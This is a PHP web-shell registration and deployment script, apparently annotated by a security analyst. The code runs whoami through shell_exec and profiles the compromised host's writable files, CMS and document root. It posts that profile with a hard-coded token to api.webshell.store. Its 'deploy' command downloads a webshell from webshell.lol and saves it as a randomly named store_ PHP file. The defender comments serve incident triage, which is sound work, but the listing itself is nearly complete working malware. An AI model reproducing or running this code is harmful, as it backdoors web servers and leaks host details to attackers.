// Analyst note: configuration for a script that profiles the host it runs on and
// reports that profile to a hard-coded remote endpoint. No authentication or
// access check on the caller is visible anywhere in this listing.
// Turn off all PHP error reporting for this request.
error_reporting(0);
// Every response this script emits is labelled as JSON.
header('Content-Type: application/json');
// Hard-coded remote endpoint; the 'default' branch POSTs the host profile to it.
// Outbound traffic from a web server to this host is an indicator to search for.
$API_URL = "https://api.webshell.store/functions/v1/seller-verify";
// Hard-coded token sent with the profile as the 'token' field of the POST body.
$TOKEN = "seller_llycvolkcrbjoddsj7db0m";
// Taken from the request's Host header, so the reported domain is client-supplied.
$CURRENT_DOMAIN = $_SERVER['HTTP_HOST'];
// Command selector read from the `cmd` query parameter; 'default' when it is absent.
$CMD = $_GET['cmd'] ?? 'default';
// Path of this script as the server reports it; sent as 'verification_filename'.
$SCRIPT_PATH = $_SERVER['SCRIPT_NAME'];
// Guess which CMS is installed by testing for well-known files and directories.
// All paths are relative, so they resolve against the process's current working
// directory (presumably the directory this script was dropped into; confirm
// during triage).
// Returns ['type' => string|null, 'version' => string|null]. A version is only
// ever filled in for WordPress; both values are null when nothing matches.
function detectCMS() {
if (file_exists('wp-login.php') || file_exists('wp-config.php')) {
$version = null;
if (file_exists('readme.html')) {
// Read failures are hidden by @; the regex then simply finds no match.
$readme = @file_get_contents('readme.html');
// Pull the first "Version x.y.z" string out of the readme.
if (preg_match('/Version\s+([0-9.]+)/i', $readme, $match)) {
$version = $match[1];
}
}
return ['type' => 'WordPress', 'version' => $version];
} elseif (file_exists('administrator/index.php')) {
return ['type' => 'Joomla', 'version' => null];
} elseif (file_exists('core/misc/drupal.js')) {
return ['type' => 'Drupal', 'version' => null];
} elseif (file_exists('skin/frontend/')) {
return ['type' => 'Magento', 'version' => null];
} elseif (file_exists('admin-dev/')) {
return ['type' => 'PrestaShop', 'version' => null];
}
// No known marker file or directory was found.
return ['type' => null, 'version' => null];
}
// Runs the OS command `whoami` through shell_exec to learn which account the PHP
// process runs as. @ hides warnings, and an empty or failed result becomes 'N/A'.
// Defender note: a web-server or PHP worker process spawning `whoami` is worth
// alerting on; listing shell_exec in disable_functions blocks this call.
$whoami = trim(@shell_exec('whoami') ?: 'N/A');
// Report whether a path has any write bit set in its permission mode.
// Returns false when the path does not exist or its mode cannot be read.
// This inspects the mode bits only (owner, group or other); it does not test
// whether the current process is actually able to write to the path.
function hasWritePerms($filepath) {
if (!file_exists($filepath)) {
return false;
}
// @ hides the warning fileperms() raises when the mode cannot be read.
$perms = @fileperms($filepath);
if ($perms === false) {
return false;
}
// Check owner write (0200), group write (0020), or other write (0002)
return (bool)($perms & 0222);
}
// Analyst note: main body. It records whether the site entry page and .htaccess
// have write bits set, then dispatches on the `cmd` query parameter.
// Check if specific files are writable
$can_edit_index = false;
if (file_exists('index.php')) {
$can_edit_index = hasWritePerms('index.php');
} elseif (file_exists('index.html')) {
$can_edit_index = hasWritePerms('index.html');
}
$can_edit_htaccess = false;
if (file_exists('.htaccess')) {
$can_edit_htaccess = hasWritePerms('.htaccess');
}
// NOTE(review): called with no argument although hasWritePerms() declares one
// required parameter; as listed, this line may abort the script before any
// command is handled. Confirm against the PHP version on the affected host.
$can_create_files = hasWritePerms();
$cms = detectCMS();
if ($CMD === 'default') {
// 'default': build a profile of this host (domain, OS account, writable files,
// CMS type and version, script path, document root).
$response = [
'domain' => $CURRENT_DOMAIN,
'whoami' => $whoami,
'can_edit_index' => $can_edit_index,
'can_create_files' => $can_create_files,
'can_edit_htaccess' => $can_edit_htaccess,
'cms_type' => $cms['type'],
'cms_version' => $cms['version'],
'verification_filename' => $SCRIPT_PATH,
'document_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : 'N/A'
];
// The profile is wrapped with the hard-coded token under the action 'register'.
$data = [
'action' => 'register',
'token' => $TOKEN,
'domain' => $CURRENT_DOMAIN,
'verification_data' => $response
];
// POST the wrapped profile as JSON to the hard-coded endpoint, with TLS peer
// verification on and a 30-second timeout.
// Defender note: this outbound request is visible in egress, proxy or DNS logs.
$ch = curl_init($API_URL);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$api_response = curl_exec($ch);
$curl_error = curl_error($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Fold the outcome of the POST into the response: transport error, non-200
// status, undecodable body, or the remote 'success' / 'error' fields.
if ($curl_error) {
$response['registered'] = false;
$response['message'] = 'Connection error: ' . $curl_error;
$response['debug'] = ['api_url' => $API_URL, 'curl_error' => $curl_error];
} elseif ($http_code !== 200) {
$response['registered'] = false;
$response['message'] = 'API error (HTTP ' . $http_code . ')';
$response['debug'] = ['http_code' => $http_code, 'response' => substr($api_response, 0, 500)];
} else {
$result = json_decode($api_response, true);
if (json_last_error() !== JSON_ERROR_NONE) {
$response['registered'] = false;
$response['message'] = 'Invalid API response: ' . json_last_error_msg();
$response['debug'] = ['response' => substr($api_response, 0, 500)];
} else {
$response['registered'] = $result['success'] ?? false;
$response['message'] = $result['success'] ? 'Domain registered' : ($result['error'] ?? 'Registration failed');
if (!$result['success'] && isset($result['error'])) {
$response['debug'] = ['error_detail' => $result['error']];
}
}
}
// The full profile is also echoed to whoever made the request, so any caller
// learns the OS account name and the document root.
echo json_encode($response, JSON_PRETTY_PRINT);
} elseif ($CMD === 'deploy') {
// 'deploy': fetch content from a hard-coded URL and save it as a new .php file
// through a relative path, i.e. in the process's current working directory.
// Fetching a URL with file_get_contents depends on allow_url_fopen being enabled.
$webshell_url = 'https://webshell.lol/x.txt';
$webshell_content = @file_get_contents($webshell_url);
if ($webshell_content) {
// File name is "store_" plus the first 8 hex characters of an MD5 digest, plus ".php".
// Defender note: hunt for unexpected store_<8 hex chars>.php files beside this
// script and for web-server requests to the hosts hard-coded in this file.
// Denying PHP execution in writable directories limits what such a file can do.
$random = substr(md5(time() . rand()), 0, 8);
$webshell_filename = "store_" . $random . ".php";
if (@file_put_contents($webshell_filename, $webshell_content)) {
// The generated file name is returned to the requester.
echo json_encode([
'success' => true,
'filename' => $webshell_filename,
'message' => 'Webshell deployed successfully'
], JSON_PRETTY_PRINT);
} else {
echo json_encode([
'success' => false,
'error' => 'Failed to save webshell file'
], JSON_PRETTY_PRINT);
}
} else {
echo json_encode([
'success' => false,
'error' => 'Failed to download webshell'
], JSON_PRETTY_PRINT);
}
} else {
// Any other `cmd` value: reply with the list of accepted commands.
echo json_encode([
'error' => 'Invalid command',
'available_commands' => ['default', 'deploy']
], JSON_PRETTY_PRINT);
}